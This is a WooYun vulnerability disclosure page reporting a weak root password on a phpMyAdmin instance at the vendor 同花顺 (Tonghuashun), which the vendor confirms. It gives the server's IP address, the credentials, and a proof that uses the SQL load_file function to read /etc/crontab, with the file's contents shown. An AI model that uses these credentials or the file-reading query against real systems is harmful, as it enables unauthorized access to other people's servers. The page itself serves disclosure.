当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0203031

漏洞标题:同花顺某phpMyAdmin存在root弱口令

相关厂商:同花顺

漏洞作者: 路人甲

提交时间:2016-04-28 14:43

修复时间:2016-06-12 15:40

公开时间:2016-06-12 15:40

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-28: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经确认,细节仅向厂商公开
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

简要描述:

同花顺某phpMyAdmin存在root弱口令

详细说明:

http://183.131.12.139:81/phpmyadmin/
root
123456
/hxapp/hqserver/ 同花顺行情服务器的标志

漏洞证明:

select load_file('/etc/crontab');

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root ntpdate ntp1.nl.net >/dev/null 2>&1
*/3 8-16 * * 1-5 root sh /home/netstat/update_link_relation.sh > /dev/nul
*/1 * * * * root sh /home/l2log/update_log.sh > /dev/nul
*/1 8-16 * * 1-5 root sh /usr/local/nagios/var/processLog_cp.sh > /dev/nul
00 17 * * * root sh /home/lossreport/loss_report.sh >/dev/null 2>&1
##00 22 * * 1-5 root sh /home/arping/deal_arping_file.sh >/dev/null 2>&1
*/1 * * * * root sh /home/netcheck/netcheck_log.sh >/dev/null 2>&1
##*/1 8-15 * * 1-5 root sh /home/netinfo/fpinglog_check.sh > /dev/nul
#* * * * * root flock -xn /usr/local/nagios/var/log_summary/log_summary.sh /usr/local/nagios/var/log_summary/log_summary.sh >> /tmp/a.txt 2>&1
#00 23 * * * root sh /usr/local/nagios/var/log_summary/nagioslog_backup/nagioslog_backup.sh > /dev/null
00 22 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
25 17 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
00 09 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
*/5 22-23 * * 1-5 root sh /home/arping/arping.sh > /dev/nul
#*/1 * * * 1-5 root sh /home/check_loss/check_loss.sh >/dev/null 2>&1
59 05 * * * root mv /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.6am
#*/1 * * * 1-5 root sh /home/add_realtime_task/add_realtime_task.sh >/dev/null 2>&1
##59 23 * * 0-6 root sh /home/netcheck/netcheck_db_back.sh >/dev/null
##59 23 * * 0-6 root sh /home/netcheck/netstat_db_back.sh >/dev/null
#45 08 * * * root cp /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.am8045
##* * * * * root flock -xn /tmp/1.lock sh /tmp/1.sh
#*/5 * * * * root flock -xn /home/nagios/CheckNagios/SendMail_PollerError.sh sh /home/nagios/CheckNagios/SendMail_PollerError.sh
* * * * * root /usr/local/nagios/var/log_summary/poller_log_filter.sh
*/5 * * * * root sh /home/nagios/CheckNagios/checkNagiosProcess.sh
00 */2 * * * root sh /home/nagios/CheckNagios/checkDebugFile.sh
*/5 * * * 1-5 root sh /home/realtime_check/update_realtime.sh >/dev/null 2>&1
*/30 * * * * root sh /usr/local/nagios/libexec/check_poller_disk > /dev/null
00 05 * * * root sh /hxapp/hqserver/bin/Sf_Disk.sh >/dev/null 2>&1

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-04-28 15:35

厂商回复:

你好,漏洞已经确认,正在进行处理,谢谢。

最新状态:

暂无


漏洞评价:

评价